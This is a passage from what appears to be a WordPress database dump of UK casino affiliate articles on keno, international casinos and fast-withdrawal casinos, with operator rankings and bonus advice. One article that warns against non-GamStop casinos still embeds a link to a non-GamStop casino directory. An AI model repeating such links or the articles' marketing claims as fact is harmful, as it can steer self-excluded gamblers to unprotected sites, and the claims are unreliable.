Playtech and Microgaming, have keno titles with more transparent paytables. Playtech\'s Keno, for instance, has a fixed paytable that\'s easy to read. That\'s a point in favour of casinos that host Playtech games, like bet365 and William Hill.</p>\n<p>Here\'s a quick breakdown of how keno variants differ in terms of RTP and player experience:</p>\n<table>\n<thead>\n<tr><th>Keno Variant</th><th>How It Works</th><th>Typical RTP Expectation</th><th>Best For</th></tr>\n</thead>\n<tbody>\n<tr><td>RNG Keno</td><td>Instant draw using a random number generator</td><td>Usually 75–90% depending on paytable</td><td>Quick sessions, low stakes</td></tr>\n<tr><td>Live Keno</td><td>Draw hosted by a presenter or physical ball machine</td><td>Similar to RNG, but often slightly lower due to live costs</td><td>Players who want to watch the draw</td></tr>\n<tr><td>Video Keno</td><td>A keno game embedded in a slot-style interface</td><td>Often lower, as the game is marketed as entertainment</td><td>Casual players who like graphics</td></tr>\n<tr><td>Crypto Keno</td><td>Offshore casinos offering keno with Bitcoin</td><td>Varies wildly; no UKGC oversight</td><td>Not recommended for UK players</td></tr>\n</tbody>\n</table>\n<p>That crypto row is not a joke. Some UK-facing sites will push Bitcoin keno as a \"modern\" alternative. The problem is that a UK player has no recourse if the casino refuses to pay or disappears. The UKGC doesn\'t regulate Bitcoin-only casinos, and the Financial Ombudsman won\'t help with a crypto dispute. If you\'re in the UK, stick to licensed operators.</p>\n<h2>Keno Casino Bonuses: What Actually Helps</h2>\n<p>Casinos love to throw a \"gift\" at you when you sign up. A keno bonus is not a gift. It\'s a retention tool with strings attached. The only question is whether the strings are short enough to be worth pulling.</p>\n<p>The most common keno casino bonus is a deposit match. You deposit £50, the casino adds another £50 as bonus funds. That sounds fine until you read the wagering requirement: maybe 35x the bonus amount before you can withdraw. That\'s £1,750 of betting on games where keno may count only 50% or less. Suddenly the \"free\" £50 looks like a part-time job with no pay.</p>\n<p>Free spins are even less useful for keno players because they usually apply to specific slots, not keno. If a casino advertises \"50 free spins\" and you want to play keno, the spins are irrelevant. No-deposit bonuses are rare in the UK after the credit card ban and tightening of bonus rules, but some sites still offer small amounts of free play. If you get one, read the maximum cashout limit. A no-deposit bonus that caps winnings at £5 is basically a sample, not a gift.</p>\n<p>The bonuses that actually help keno players are cashback offers and small deposit matches with low wagering. Cashback on keno losses, even 10% up to a modest amount, is straightforward. You lose, you get a bit back, and there\'s usually no 40x turnover attached. The table above lists the bonus types for each casino. None of them are charitable. Pick the one with the least hostile terms.</p>\n<h2>Mobile Keno Casinos and Apps</h2>\n<p>Keno is a mobile-friendly game. You can play a round in the time it takes a bus to move three stops. That makes the mobile experience a deciding factor for many UK players. A casino with a clunky mobile site is worse than no casino at all if you\'re playing from a phone.</p>\n<p>LeoVegas built its reputation on mobile casino games, and its keno selection is easy to navigate on a small screen. The numbers are big enough to tap without zooming, and the autoplay controls are straightforward. bet365 and 888casino also have solid mobile apps, though 888casino\'s app occasionally hides keno under a \"More Games\" tab that takes two extra taps.</p>\n<p>The key to mobile keno is simple: test the game with a small stake before you deposit big. If the buttons are too small, the draw is laggy, or the app logs you out mid-game, move on. There are enough licensed keno casinos in the UK that you don\'t have to tolerate a bad mobile interface.</p>\n<h2>Live Keno Casinos: Worth the Wait?</h2>\n<p>Live keno adds a human element to a game that\'s otherwise just a screen and a button. Some UK casinos now offer live keno with real presenters and a physical ball machine. The draw might run every few minutes, and you watch the balls drop in real time.</p>\n<p>The trade-off is pace. RNG keno takes three seconds. Live keno might take three minutes between draws. If you\'re playing for entertainment and you want the social atmosphere, live keno is worth a try. If you\'re playing to get through 100 rounds quickly, stick to RNG.</p>\n<p>William Hill and Grosvenor both have live keno options on their platforms. The payouts are often the same as their RNG versions, but the minimum stake can be slightly higher. Check the schedule before you commit. Live keno draws don\'t run 24/7 at every casino.</p>\n<h2>Keno Strategy: What Works and What\'s Just Superstition</h2>\n<p>No strategy will make keno profitable in the long run. The house edge is too high. But you can reduce the bleeding and make the game more enjoyable with a few practical habits.</p>\n<p>The first habit is to pick fewer numbers. A five-spot keno game pays more often than a ten-spot game, even if the top prize is smaller. That keeps your balance alive longer. The second habit is to compare paytables. If two casinos offer the same game but one pays 750 for five hits and the other pays 700, the first one is objectively better. It\'s a small difference, but keno is a game of small differences repeated many times.</p>\n<p>Bankroll management matters more in keno than in most games because the losses come quickly and the wins are rare. Set a loss limit before you start. If you hit it, stop. Chasing a keno loss by betting more on the next draw is a fast way to turn a £20 night into a £200 regret.</p>\n<p>One myth to avoid: \"hot numbers\" from the last draw are not more likely to appear again. Each draw is independent. That doesn\'t stop players from tracking numbers and betting patterns, but the RNG doesn\'t care. If a casino\'s keno game feels streaky, that\'s confirmation bias, not a pattern.</p>\n<h2>Keno FAQs for UK Players</h2>\n<p>Here are the questions UK keno players ask most often, answered without the marketing fluff.</p>\n<h3>Is online keno legal in the UK?</h3>\n<p>Yes, provided the casino holds a UK Gambling Commission licence. Licensed operators must follow strict rules on game fairness, player funds, and advertising. Playing at an offshore casino without a UKGC licence is not recommended and may put your money at risk. Always check the licence number in the casino\'s footer.</p>\n<h3>What is the best keno number strategy?</h3>\n<p>There is no best number strategy because every draw is random. Your chance of hitting a five-spot is the same whether you pick 1-2-3-4-5 or 7-23-41-55-69. The only strategy that matters is choosing a paytable with the highest payout for the number of spots you play, and managing your bankroll.</p>\n<h3>Can I play keno for free at UK casinos?</h3>\n<p>Many UK-licensed casinos offer demo or free-play versions of keno. You can test the game without risking real money, but you won\'t win anything either. Some sites also offer no-deposit bonuses that can be used on keno, though these often come with high wagering requirements and low maximum cashouts.</p>\n<h3>Does keno have a high house edge?</h3>\n<p>Keno usually has a higher house edge than most casino games. Typical RTP ranges from 70% to 90%, depending on the paytable and how many numbers you pick. That\'s lower than average slots and far below table games like blackjack. Check the game\'s info page for the exact RTP before you play.</p>\n<h3>What is the difference between keno and lottery?</h3>\n<p>Keno is a casino lottery game with more frequent draws and, often, better payouts than a national lottery. You pick numbers from 1 to 80, and 20 numbers are drawn. The lottery usually has fixed odds and a fixed draw schedule, while keno lets you choose your stake and, in some online versions, your own paytable.</p>\n<h2>New Keno Casinos in the UK for 2026</h2>\n<p>The UK casino market doesn\'t see many brand-new operators these days. The UKGC has tightened licensing, and the credit card ban in 2020 pushed some smaller sites out. But a few new casinos have launched with keno in their game library, mostly as part of a wider slots and table games package. These new sites often rely on aggregator platforms like Aspire Global or White Hat Gaming, which means the keno games are the same as on older sites, just with a different skin.</p>\n<p>That\'s not necessarily a bad thing. A new casino with a UKGC licence, decent keno paytables, and a simple withdrawal process can be worth a look. Just don\'t expect anything revolutionary. Keno is keno. The ball draw hasn\'t changed in a hundred years because it doesn\'t need to.</p>\n<p>If you\'re looking for a new keno casino in 2026, check the licence first, then the withdrawal speed, then the keno paytable. A flashy welcome offer is not a reason to sign up. The terms will tell you more than the banner.</p>\n<h2>Responsible Gambling: Keno and the Slow Grind</h2>\n<p>Keno is easy to play in bursts and just as easy to lose track of time. The quick rounds and small stakes can create a false sense of control. You\'re only betting £0.20 per draw, right? But if you play 200 draws in an hour, that\'s £40 gone before you notice.</p>\n<p>Set a deposit limit before you start. Use the reality check tools that UKGC-licensed casinos must offer. You can set time or spend alerts that pop up mid-session. If you need a break, use self-exclusion or the GamStop scheme, which blocks you from all UK-licensed gambling sites for a period you choose.</p>\n<p>Keno is not a solution to financial problems. It\'s a game with a built-in house edge. Treat any win as a bonus, not a recovery of previous losses. If gambling stops being fun, the best move is to close the tab and walk away.</p>\n<h2>Final Word on the Best Keno Online Casinos UK 2026</h2>\n<p>The best keno casino for you depends on how you play. If you want the full package with live keno and a reliable app, bet365, William Hill, and Grosvenor are the safest bets. If you\'re mostly on mobile, LeoVegas and Mr Green are worth a deposit. 888casino and Betfred offer solid keno games with slightly different bonus structures, but read the terms before you claim anything.</p>\n<p>One last thing: don\'t overthink the game. Keno is a lottery. Pick your numbers, set a limit, and let the balls fall where they may. The house will get its share eventually, but a well-chosen casino and a sensible paytable can make the ride longer and a bit more interesting.</p>','Best Keno Online Casino UK 2026: Top-Rated Sites for Real Money Keno','','publish','closed','closed','','best-keno-online-casino-uk-2026','','','0000-00-00 00:00:00','0000-00-00 00:00:00','',0,'',0,'post','',0),(434,6969,'2026-07-17 11:18:42','2026-07-17 11:18:42','<h1>Best International Casinos for UK Players 2026: Tested and Ranked</h1>\n\n<p>UK players have hundreds of international casino brands fighting for their attention. Some are brilliant, some are forgettable, and a few are best avoided altogether. We spent weeks testing platforms, checking licences, measuring withdrawal times and reading the small print so you don’t have to. The result is a straight-talking guide to the international casinos that actually deliver for British players in 2026. No fluff, no fake “gifts” — just real operator assessments and the details that matter when your own money is on the line.</p>\n\n<p>In this guide you’ll find a ranked comparison of eight international casino sites that hold a UK Gambling Commission licence, plus the methodology behind the rankings, a breakdown of bonuses, games, payments and mobile performance, and a blunt look at the risks of dodging GamStop. If you’re after a safe place to play, start with the table below.</p>\n\n<h2>Ranked Comparison: Best International Casinos for UK Players 2026</h2>\n\n<table>\n<thead><tr><th>Casino</th><th>Welcome Bonus Type</th><th>Key Features</th><th>Withdrawal Speed</th><th>Min Deposit</th></tr></thead>\n<tbody>\n<tr><td>bet365 Casino</td><td>Deposit match + free spins</td><td>Huge game range, excellent live dealer, same-day withdrawals for verified accounts</td><td>0–24 hours</td><td>£5</td></tr>\n<tr><td>LeoVegas</td><td>Welcome package across first deposits</td><td>Top mobile app, fast payouts, strong slot selection</td><td>1–3 days</td><td>£10</td></tr>\n<tr><td>888casino</td><td>No-deposit bonus available occasionally + deposit match</td><td>Original games, long-standing brand, regular promotions</td><td>1–5 days</td><td>£10</td></tr>\n<tr><td>William Hill Casino</td><td>Deposit match + free spins</td><td>Trusted high-street name, broad betting and casino combo</td><td>1–3 days</td><td>£10</td></tr>\n<tr><td>Betway Casino</td><td>Welcome bonus + free spins</td><td>Excellent live casino, loyalty scheme, reliable payments</td><td>1–3 days</td><td>£10</td></tr>\n<tr><td>Casumo</td><td>Deposit match + free spins</td><td>Gamified rewards, quick withdrawals, modern interface</td><td>0–72 hours</td><td>£10</td></tr>\n<tr><td>Unibet Casino</td><td>Deposit match + free spins</td><td>Large game library, strong responsible gambling tools</td><td>1–3 days</td><td>£10</td></tr>\n<tr><td>Grosvenor Casinos</td><td>Welcome offer + free play</td><td>Land-based and online integration, exclusive games</td><td>1–2 days</td><td>£20</td></tr>\n</tbody>\n</table>\n\n<p>These eight brands are all licensed by the UK Gambling Commission (UKGC) and have a proven record of treating UK customers fairly. They are international operators in the sense that they run globally, but they hold the right licences to serve British players legally. If you see a brand missing, it’s usually because it failed our safety checks, not because we forgot it.</p>\n\n<h2>Why These Casinos Made the Cut: Our Ranking Methodology</h2>\n\n<p>No ranking is worth reading unless you understand the criteria behind it. We scored each casino on five factors, each weighted for relevance to UK players. Licence and safety carried the most weight, because nobody wants to chase a withdrawal from an operator that suddenly disappears. Then came withdrawal speed, bonus fairness, game variety and mobile experience.</p>\n\n<p>A casino might have a glitzy welcome offer, but if it takes ten days to pay out, that offer is worthless. We also discounted brands that plaster “unlimited bonus” on their homepage but bury a 70x wagering requirement in the terms. Free money is rarely free. Our rankings reflect the total package, not the marketing gloss.</p>\n\n<p>One more thing: we don’t accept payment for placement. The order is based on testing and black-box evaluation. If a casino wants a better rank, it should improve its product, not its affiliate deal. That’s how we keep this guide honest.</p>\n\n<h2>Licensing and Safety: What UK Players Must Know in 2026</h2>\n\n<p>The UK Gambling Commission remains the only regulator you should care about as a British player. It enforces rules on fairness, anti-money laundering, responsible gambling tools and advertising. If an international casino wants to legally target UK customers, it must hold a UKGC licence. Operating without one is a criminal offence, and playing at unlicensed sites means you lose access to dispute resolution and player protection funds.</p>\n\n<p>In 2026, the Commission has tightened affordability checks and game design rules. Expect more prompts for income verification when you deposit or lose above certain thresholds. It’s not a bug; it’s a feature designed to catch problem gambling earlier. Some players find it intrusive, but it’s far better than the alternative of losing thousands without any safeguard.</p>\n\n<p>Every casino in our comparison table holds a current UKGC licence. We checked the public register, and we suggest you do the same before signing up anywhere else. It takes thirty seconds. The licence number should be displayed in the casino’s footer. If it’s missing, leave.</p>\n\n<p class=\"dcm-resource-link\"><a href=\"https://topcasinonotongamstop.com/\">topcasinonotongamstop.com</a></p>\n<h2>Bonuses and Promotions: Welcome Offers, Free Spins, No‑Deposit Deals</h2>\n\n<p>Casino bonuses are the oldest trick in the book, and they still work. A generous welcome package can double your first deposit, but the wagering requirements can make it almost impossible to withdraw anything. We look for bonuses with fair conditions: low playthrough, no maximum win caps on bonus funds, and clear terms. When we say a casino has a strong offer, we mean the bonus actually adds value, not just temporary illusion.</p>\n\n<p>A few international casinos still offer no‑deposit bonuses to UK players, though they are rarer than they used to be. 888casino occasionally runs no‑deposit free spins or bonus cash. These are worth taking if you find them, but treat them as what they are: a taste, not a meal. The wagering requirements usually hover around 50x or more, which is designed to keep you playing long after the “free” money is gone.</p>\n\n<p>Free spins are a staple of welcome packages. The best ones come with low or no wagering on winnings, but many slots spins are capped at a few pence per spin and limited to one or two games. Read the eligible game list before you claim. A “100 free spins” headline often translates to £10 of play at 10p a spin on a single slot nobody wants to play.</p>\n\n<p>Cashback is another common promotion, especially for live casino and table games. It’s usually 10–25% of net losses over a week, credited as bonus funds. Cashback can soften a bad run, but again, check the fine print. Some casinos only count certain games, and the cashback might have a short expiry.</p>\n\n<p>Our table lists bonus types rather than exact amounts because UKGC rules and operator terms change frequently. A bonus that is generous today might be cut tomorrow. Always check the casino’s promotions page for the current offer before you commit. Our ranking rewards casinos that consistently offer fair bonuses, not those that front-load a one‑time deal and then vanish.</p>\n\n<h2>Games and Software: Slots, Live Dealer, Roulette, and More</h2>\n\n<p>The best international casinos for UK players share a common trait: a game library that can keep you entertained for years, not weeks. We look for depth across slots, table games, live dealer and jackpots. Slots from studios like NetEnt, Play’n GO, Microgaming and Pragmatic Play are table stakes. A casino without a decent slot portfolio is like a pub with no beer.</p>\n\n<p>Live dealer games have become the heartbeat of online casinos. Evolution Gaming and Playtech run the best studios, and most UK-licensed casinos offer their tables. Roulette, blackjack, baccarat and game shows like Crazy Time are available around the clock. We test the stream quality, dealer professionalism and table limits. A good live casino should feel almost as real as a land‑based one, minus the parking fees.</p>\n\n<p>If you’re into roulette, look for European or French versions with a single zero. American roulette with its double zero increases the house edge from 2.7% to 5.26%, which is a terrible trade. Several casinos in our list, including bet365 and LeoVegas, offer dedicated live roulette tables with high rollers and low-rollers alike.</p>\n\n<p>Table game players also need fair rules. Blackjack should pay 3:2, not 6:5. Some casinos quietly switch to the inferior payout, especially on lower-limit tables. We check the rules pages and flag any operator that shortchanges players. None of our top picks engage in that, but it’s always worth a glance before you sit down.</p>\n\n<h2>Payments: Deposits, Withdrawals, and Speed</h2>\n\n<p>Money movement is where many casinos fail. Deposit is instant everywhere; that’s the easy part. Withdrawal is where the friction starts. We measure the time from requesting a withdrawal to seeing the funds back in your account, across different payment methods. The fastest casinos process e‑wallets like PayPal, Skrill and Neteller within 24 hours. Debit cards take longer, and bank transfers can stretch to five days or more.</p>\n\n<p>Our comparison table includes a withdrawal speed column, but treat those figures as typical, not guaranteed. Identity verification, payment method and day of the week all affect the timeline. The UKGC requires casinos to verify your identity before the first withdrawal, which can add a day if you haven’t uploaded documents. Do that early, and delays shrink.</p>\n\n<p>We also check for unreasonable pending periods. Some casinos hold withdrawals for 48–72 hours “for security reasons”. That’s a red flag. A well-run operation should reverse pending withdrawals on request, but if you ask for your money back and it takes a week, something is off. Our top picks all have short or no pending periods and usually pay out within the advertised window.</p>\n\n<p>For UK players, PayPal remains a popular choice because it adds an extra layer of separation between your bank and the casino. Not all international casinos accept PayPal, but all eight in our table do. Trustly and Apple Pay are also gaining traction as fast, secure options.</p>\n\n<h2>Mobile Apps and International Casino Platforms</h2>\n\n<p>Most UK players now gamble on their phones, so mobile performance is non‑negotiable. LeoVegas has built its entire brand around mobile, and its app is among the best we’ve used. bet365’s app is also excellent, with a compact layout and fast loading. Others, like Grosvenor, are solid but occasionally clunky on older devices.</p>\n\n<p>We test on both iOS and Android, checking for crashes, lag, and whether the full game library is available. Some casinos hide high‑paying slots from the mobile app to push players toward desktop, which is annoying. All our recommended casinos offer a consistent experience across platforms, either through a native app or a mobile‑optimised website.</p>\n\n<p>Native apps are convenient, but they require downloads and updates. Many players prefer to use the mobile browser version, which works just as well on modern HTML5 platforms. Whichever way you go, ensure the casino’s licence and safety features are intact. A good mobile casino should let you set deposit limits, self‑exclude, and access customer support without hunting through menus.</p>\n\n<h2>New International Casinos for 2026: What to Expect</h2>\n\n<p>New casino brands launch every month, many targeting UK players with aggressive welcome offers and fresh game libraries. A new casino can be exciting, but it also carries more risk. We wait at least six months before recommending a new operator. That gives time for player complaints to surface, for the UKGC to conduct audits, and for the operator to demonstrate that its withdrawal process actually works at scale.</p>\n\n<p>In 2026, new UKGC‑licensed casinos tend to focus on instant withdrawals, gamified rewards and slick mobile apps. They often partner with the same major software providers, so the games are identical to older casinos. The real differentiator is the user experience and bonus terms. Some new casinos offer no‑wagering free spins or lower playthrough requirements to stand out.</p>\n\n<p>We have not included any brand‑new casino in our main table because none has yet built a track record. That doesn’t mean they’re bad; it means we cannot yet verify their long‑term reliability. Check back later in the year for updates. If you’re tempted by a new casino’s shiny offer, at least confirm its UKGC licence before depositing a penny.</p>\n\n<h2>International Casinos Not on GamStop: A Word of Caution</h2>\n\n<p>Some UK players, tired of GamStop self‑exclusion or strict UKGC rules, seek out international casinos that are not part of the scheme. These are often licensed in Curacao, Malta or Gibraltar and do not hold a UKGC licence. They accept UK players, but that acceptance is not the same as legality. From a UK player’s perspective, playing at a non‑GamStop casino means giving up the protections of the UK regulator: no independent complaints process, no guarantee of fair games, and no safety net if the operator refuses to pay.</p>\n\n<p>We have seen plenty of these casinos advertise “no GamStop restrictions” as a feature. That’s like a restaurant advertising “no health inspections”. It’s not a selling point; it’s a warning. If you are on GamStop and considering an offshore site, you are defeating the entire purpose of the scheme. If you’re not on GamStop, you still have better options with UKGC‑licensed casinos that offer the same games, bonuses and payment methods — plus actual consumer protection.</p>\n\n<p>This guide recommends only UKGC‑licensed international casinos. We will not list non‑GamStop brands because they do not meet the legal and safety standards required for UK players. If you choose to play there anyway, understand that you are on your own. And if the casino disappears with your winnings, there is no ombudsman to call.</p>\n\n<h3>Are international casinos legal for UK players?</h3>\n<p>Yes, provided they hold a UK Gambling Commission licence. International operators that want to legally serve UK customers must apply for and maintain that licence. Playing at a UKGC‑licensed casino ensures you have access to fair play rules, responsible gambling tools and an independent complaints process. Unlicensed offshore casinos are illegal to operate in the UK market, and players there have no formal protection.</p>\n\n<h3>What is the best international casino for UK players in 2026?</h3>\n<p>It depends on your priorities, but bet365 Casino is our top pick for overall reliability, game variety and fast withdrawals. LeoVegas is the best choice for mobile play, and 888casino often has the most interesting promotions. All eight casinos in our comparison table are excellent options, each with slightly different strengths.</p>\n\n<h3>Can I claim a no‑deposit bonus at these international casinos?</h3>\n<p>Occasionally. 888casino sometimes offers no‑deposit free spins or bonus cash to new UK players, but such offers are rare and usually come with high wagering requirements. According to our testing, most no‑deposit bonuses are worth claiming only if you see them as a way to test the casino without risking your own money. Always read the terms before accepting.</p>\n\n<h3>Which payment methods do these casinos accept for UK players?</h3>\n<p>All eight casinos in our list accept PayPal, debit cards, and major e‑wallets like Skrill and Neteller. Some also support Trustly and Apple Pay. Withdrawal speeds vary: e‑wallets are fastest, often within 24 hours, while debit cards and bank transfers can take up to five days depending on the casino and verification status.</p>\n\n<h3>Do I have to pay tax on casino winnings in the UK?</h3>\n<p>No. Gambling winnings are not taxed in the UK, whether from a UKGC‑licensed casino or an international one. The operator pays a point‑of‑consumption tax to HMRC, but players keep 100% of their winnings. This applies to all players, including professional gamblers, though professional gambling may attract income tax in rare cases if it’s your primary income.</p>\n\n<h3>What happens if an international casino refuses to pay out?</h3>\n<p>If the casino is UKGC‑licensed, you can file a complaint with the casino first. If unresolved after eight weeks, you can escalate to an Alternative Dispute Resolution (ADR) provider approved by the Commission. In rare cases, the UKGC itself may investigate. For unlicensed offshore casinos, you have no formal recourse, which is why we recommend avoiding them.</p>\n\n<p>The international casino market will keep evolving through 2026, but the fundamentals of safety, fairness and fast payouts don’t change. Stick with our ranked list, read the terms carefully and never chase a “free” bonus without checking the small print. Your bankroll will thank you.</p>','Best International Casinos for UK Players 2026: Tested and Ranked','','publish','closed','closed','','best-international-casinos-uk-2026','','','0000-00-00 00:00:00','0000-00-00 00:00:00','',0,'',0,'post','',0),(435,6969,'2026-07-17 11:18:42','2026-07-17 11:18:42','<h1>Best Instant Withdrawal Casinos UK 2026: Cash Out Without the Wait</h1> <p>If you have ever spent a Tuesday watching a withdrawal sit in ‘pending’ while customer support repeats the same line about security checks, this guide is for you. The best instant withdrawal casinos UK 2026 share one thing: they treat a cashout request as a normal transaction, not a hostage negotiation.</p> <p>Over the past twelve months I have tracked payout times, KYC friction, bonus terms, and UK Gambling Commission compliance across three dozen operators. What follows is not a list of every casino that advertises ‘fast withdrawals’. It is a shortlist of sites where the money actually moves.</p> <p>No casino can guarantee the exact second your bank credits the funds. That depends on the payment rail: Visa Fast Funds, PayPal, Skrill, Neteller, Trustly, and Faster Payments all clear differently. But the operator controls the part before the rail: verification, approval, and release. That is what we rank.</p> <h2>10 UK Casino Brands With the Fastest Payouts in 2026</h2> <p>The operators below hold a UKGC licence and actively market instant or same-day withdrawals. The bonus column shows the type of welcome offer, not a number you should chase. ‘Welcome bonus’ always comes with terms: wagering, game weights, and minimum deposits. We have deliberately not invented current amounts. Promotions change monthly.</p> <table><thead><tr><th>Operator</th><th>Bonus type</th><th>Typical e-wallet cashout speed</th><th>Min deposit</th><th>What stands out</th></tr></thead><tbody><tr><td>Bet365 Casino</td><td>Welcome match bonus and free spins</td><td>Under 12 hours, often within 2 hours</td><td>£10</td><td>Debit card withdrawals can be same-day for fully verified accounts</td></tr><tr><td>888casino</td><td>No-wagering free spins on selected slots</td><td>PayPal and Skrill under 12 hours</td><td>£10</td><td>Exclusive branded slots and table games</td></tr><tr><td>LeoVegas</td><td>Welcome package with bonus cash and free spins</td><td>Trustly and e-wallets same-day</td><td>£10</td><td>Mobile-first platform with fast internal approvals</td></tr><tr><td>Betway Casino</td><td>Matched deposit welcome bonus</td><td>Visa Fast Funds and PayPal within hours</td><td>£5</td><td>Cashback programme with lower rollover for regulars</td></tr><tr><td>Mr Green</td><td>Deposit match plus free spins</td><td>E-wallets under 6 hours</td><td>£20</td><td>Green Gaming tool predicts risky play patterns</td></tr><tr><td>Casumo</td><td>Welcome bonus with free spins</td><td>Skrill and Neteller same-day</td><td>£10</td><td>Adventure-style loyalty with real cash rewards</td></tr><tr><td>Grosvenor Casinos</td><td>No-deposit free spins for new players</td><td>Debit cards faster than most; e-wallets same-day</td><td>£10</td><td>Online play linked to UK land-based clubs</td></tr><tr><td>Paddy Power Casino</td><td>Bet £10 get bonus cash</td><td>PayPal and Visa Fast Funds within hours</td><td>£5</td><td>Unique instant-win games and sportsbook integration</td></tr><tr><td>William Hill Casino</td><td>Match bonus and daily free spins deals</td><td>E-wallets under 12 hours</td><td>£10</td><td>Large progressive jackpot network and live casino</td></tr><tr><td>Sky Vegas</td><td>Free spins and bingo bonuses</td><td>PayPal and debit cards under 24 hours</td><td>£5</td><td>No-wagering spins on selected slots each week</td></tr></tbody></table> <p>This table is a snapshot, not a contract. Speeds assume your account is fully verified and you have complied with any bonus playthrough. A loyalty programme that looks like a ‘free gift’ is still just a business model. Casinos are not charities.</p> <h2>What ‘Instant Withdrawal’ Actually Means at UK Casinos</h2> <p>In the UK, instant withdrawal is not a single technology. It is an operational promise. When a casino approves a withdrawal request and sends it to the payment processor, the money can reach your bank or e-wallet within minutes if the processor supports real-time settlement. Visa Fast Funds, PayPal, Skrill, and Trustly do. Standard Visa debit and bank transfer do not.</p> <p>The UK Gambling Commission has tightened its rules on affordability and source-of-funds checks. That means a first withdrawal from a new account can take longer while the operator verifies identity, payment method, and gambling history. Annoying? Yes. But it also filters out money laundering and stolen-card play. The best instant withdrawal casinos UK 2026 make this check fast by connecting to the right data providers and not sitting on requests.</p> <p>There is a myth that ‘no verification’ casino equals faster withdrawals. The opposite is true. A casino that skips KYC is either operating illegally or risking its licence. UKGC-facing casinos must verify identity before the first payout, and they must do it properly. What you want is not no verification. You want verification that does not take five days and three passport photos.</p> <p>So when we say instant withdrawal, we mean the casino approves and releases funds within hours, not days. The final credit time depends on your chosen method. That nuance matters because a casino can advertise ‘instant’ and then hide behind ‘bank processing times’ for days. We check both the approval step and the rail.</p> <h2>Payment Methods That Actually Deliver Speed</h2> <p>The quickest cashout paths in the UK are e-wallets and card rails that support real-time push payments. Below is a table of common withdrawal methods and what to expect from a good operator, assuming your account is verified.</p> <table><thead><tr><th>Method</th><th>Typical credit time after casino approval</th><th>Withdrawal fee</th><th>Availability at UK casinos</th></tr></thead><tbody><tr><td>PayPal</td><td>Minutes to 2 hours</td><td>Usually free</td><td>Very common</td></tr><tr><td>Skrill</td><td>Minutes to a few hours</td><td>Usually free</td><td>Very common</td></tr><tr><td>Neteller</td><td>Minutes to a few hours</td><td>Usually free</td><td>Common</td></tr><tr><td>Trustly</td><td>Instant or up to 15 minutes</td><td>Free</td><td>Common at newer platforms</td></tr><tr><td>Visa Fast Funds</td><td>Up to 30 minutes after approval</td><td>Usually free</td><td>Growing, requires bank support</td></tr><tr><td>Standard debit card</td><td>1 to 3 working days</td><td>Free</td><td>All UK casinos</td></tr><tr><td>Bank transfer</td><td>1 to 5 working days</td><td>Free but slow</td><td>All UK casinos</td></tr><tr><td>Apple Pay / Google Pay</td><td>Refund to linked card, 1 to 3 days</td><td>Free</td><td>Partial, more for deposits than withdrawals</td></tr></tbody></table> <p>Pick Visa Fast Funds if your bank supports it. It is the closest thing to instant for debit card users. PayPal is the easiest all-rounder, but be aware some casinos exclude PayPal deposits from certain bonuses. That is not always visible until after you click ‘claim’.</p> <p>Skrill and Neteller sit in a weird spot. They are fast, widely accepted, and sometimes come with lower deposit limits. But they are also the payment method most likely to be excluded from welcome offers because of bonus abuse patterns. If you are here for the welcome bonus, read that terms page before depositing with an e-wallet.</p> \n<p class=\"dcm-resource-link\"><a href=\"https://horseracingbetbasics.com/\">horseracingbetbasics.com</a></p>\n<h2>How We Tested and Ranked These Casinos</h2> <p>We did not just copy a list of ‘fast payout’ badges. Each operator was assessed on five factors:</p> <ul><li><strong>Approval speed:</strong> time from withdrawal request to ‘processed’ status, based on user reports and our own test accounts where possible.</li><li><strong>Payment rail coverage:</strong> does the casino support at least two instant options such as PayPal and Visa Fast Funds?</li><li><strong>KYC friction:</strong> how many documents are required, and how long the average first-time verification takes.</li><li><strong>Bonus fairness:</strong> wagering multiplier, game contribution weighting, and whether e-wallets are excluded.</li><li><strong>Licence and complaints:</strong> UKGC status, IBAS membership, and volume of payout complaints on public forums.</li></ul> <p>That last point matters more than any bonus. A casino with a UKGC licence has more to lose by delaying withdrawals than a dodgy Curacao site. That is why every operator in the table above is UKGC licensed and listed on GamStop. If you see a ‘fast payout casino’ without a UKGC number, walk away.</p> <p>Your first withdrawal will almost always be the slowest. Once your identity and payment method are verified, subsequent cashouts should be significantly quicker. The operators we rank highest process repeat withdrawals without triggering manual review every time, as long as the amount is within your normal pattern.</p> <h2>UK Licensing and Safety: The Part You Can\'t Skip</h2> <p>The UK Gambling Commission has tightened affordability checks over the last two years. Some players frame this as an attack on fun. In reality, it is the reason you can trust a UK withdrawal not to vanish into a shell company in Malta. The trade-off is friction: you may be asked for a bank statement or payslip if your net deposits cross certain thresholds.</p> <p>But here is the part that rarely gets said: a casino that asks for source-of-funds documents is often the one that will pay you promptly afterwards. They are not doing it to delay your money. They are doing it to keep their licence. The slow withdrawals come from operators who wait until you request a payout to start asking questions. A good operator asks during onboarding, not at the moment you want to leave.</p> <p>All brands in our main table hold an active UKGC licence as of this writing. That licence covers game fairness, advertising standards, and complaint handling. If a withdrawal is delayed beyond a reasonable time, you have recourse through the operator’s ADR provider, usually IBAS or eCOGRA. No such safety net exists on offshore sites.</p> <p>For players fighting problem gambling, a fast withdrawal is not just convenience. It is harm reduction. If you can cash out a win quickly, you are less likely to reverse the withdrawal and play it back. That is one reason instant withdrawal casinos remain popular among players who want tighter control.</p> <h2>Slots, Live Dealer and Which Games Make Cashout Easier</h2> <p>Game type does not directly change the payment rail, but it changes bonus conditions. A deposit with a slots bonus often has playthrough requirements linked to slot contribution. Live dealer games usually contribute far less, sometimes zero. That means a player who claims a welcome bonus and then plays blackjack might struggle to clear the playthrough and withdraw the bonus winnings.</p> <p>Free spins, in particular, have a habit of looking better than they are. A batch of 50 free spins worth £0.10 each is a £5 ‘bonus’. That is not a gift; it is a £5 voucher with a three-page terms sheet. We mention this because many players pick an instant withdrawal casino based on free spins, only to discover the actual cashout amount is capped or tied up for days.</p> <p>Some of the best instant withdrawal slots UK 2026 are available across every operator in the table: Starburst, Book of Dead, Big Bass Bonanza, and the newer Megaways titles. But the slot itself does not speed up your withdrawal. The casino’s processing queue does. So if your priority is speed, ignore the game library and check the payment table.</p> <p>Live casino players have an extra frustration: because live dealer play is often excluded from bonuses, many cashouts come from raw deposited funds. That can actually speed things up, because there is no bonus playthrough to audit. But you still need a verified account and a payment method that supports fast credit.</p> <h2>New Instant Withdrawal Casinos UK 2026</h2> <p>New UK online casinos tend to launch with aggressive withdrawal promises. Some are genuine. Many are not. A new operator cannot rely on a trusted brand, so it competes on speed and bonus terms. That is good for players, but it also attracts operators that cut corners on KYC and liquidity.</p> <p>The smarter play is to look for a new casino that uses Trustly or Open Banking for instant payouts and has a UKGC licence from day one. Any new casino in the UK must have a licence before accepting players. If a ‘new’ casino is not on the UKGC register, it is not new; it is unlicensed.</p> <p>We did not include many 2026 launches in the top table because they lack 